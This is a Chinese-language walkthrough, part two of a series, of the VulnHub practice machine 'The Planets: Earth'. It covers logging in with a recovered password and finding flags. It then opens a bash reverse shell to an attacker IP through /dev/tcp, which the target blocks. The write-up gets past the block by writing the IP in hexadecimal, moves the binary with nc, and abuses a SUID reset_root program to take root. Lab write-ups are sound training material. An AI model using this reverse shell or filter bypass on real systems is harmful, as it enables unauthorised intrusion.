1. 首頁 > 生活百科 > >

vulnhub靶場之THE PLANETS: EARTH( 二 )

生活百科

#腳本結果earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

vulnhub靶場之THE PLANETS: EARTH

文章插圖
觀察到最后得字符串信息是:earthclimatechangebad4humans得重復,因此猜測密碼就是這個,因此在https://earth.local/admin/login界面使用賬戶名和密碼進行登錄:
vulnhub靶場之THE PLANETS: EARTH

文章插圖
獲取flag
根據題目描述這題是要尋找兩個flag:
vulnhub靶場之THE PLANETS: EARTH

文章插圖
因此通過find查找flag文件,find / -name "*flag*",
vulnhub靶場之THE PLANETS: EARTH

文章插圖
然后讀取下/var/earth_web/user_flag.txt文件的信息 , cat /var/earth_web/user_flag.txt,獲取到flag值:
vulnhub靶場之THE PLANETS: EARTH

文章插圖
獲取root權限
觀察到當前用戶是apache用戶,那就是還差一個root用戶,因此這里就要嘗試獲取root權限
vulnhub靶場之THE PLANETS: EARTH

文章插圖
首先獲取下root權限下的文件都有哪些 , 命令:find / -user root -perm -4000 -print 2>/dev/null,發現/usr/bin/reset_root,結果如下:
vulnhub靶場之THE PLANETS: EARTH

文章插圖
嘗試執行一下,但是重置密碼失敗
vulnhub靶場之THE PLANETS: EARTH

文章插圖
那就嘗試獲取下shell權限,開啟kali的6688端口監聽:nc -lvvp 6688
vulnhub靶場之THE PLANETS: EARTH

文章插圖
在網頁輸入框中輸入 bash -i >& /dev/tcp/ 192.168.0.12/6688 0>&1 進行執行,但是顯示被禁止了
vulnhub靶場之THE PLANETS: EARTH

文章插圖
發現被禁止后就在網上查找了以下 , 發現通過將ip地址轉換成16禁止可以進行繞過:bash -i >& /dev/tcp/0xc0.0xa8.0x0.0xc/6688 0>&1,kali端成功獲取到shell權限
vulnhub靶場之THE PLANETS: EARTH

文章插圖
因為shell上無法進行調試,因此把reset_root文件下載到本地進行調試,使用nc進行文件的傳遞,服務端:nc -nlvp 8899 >reset_root , shell端:nc 192.168.0.12 8899 < /usr/bin/reset_root,不分先后順序
vulnhub靶場之THE PLANETS: EARTH

文章插圖
然后使用strace進行調試:strace ./reset_root , 顯示缺少三個文件
access("/dev/shm/kHgTFI5G", F_OK)= -1 ENOENT (No such file or directory)access("/dev/shm/Zw7bV9U5", F_OK)= -1 ENOENT (No such file or directory)access("/tmp/kcM0Wewe", F_OK)= -1 ENOENT (No such file or directory)write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.) = 44
vulnhub靶場之THE PLANETS: EARTH

文章插圖
那就去靶機上看一下這幾個文件,發現靶機上也沒有這幾個文件
vulnhub靶場之THE PLANETS: EARTH

文章插圖
那就創建這幾個文件后在嘗試執行下reset_root文件 , 成功修改su密碼為:Earth
vulnhub靶場之THE PLANETS: EARTH

文章插圖

vulnhub靶場之THE PLANETS: EARTH

文章插圖
在root權限下查找flag文件并讀取flag值
vulnhub靶場之THE PLANETS: EARTH

文章插圖
【vulnhub靶場之THE PLANETS: EARTH】

推薦閱讀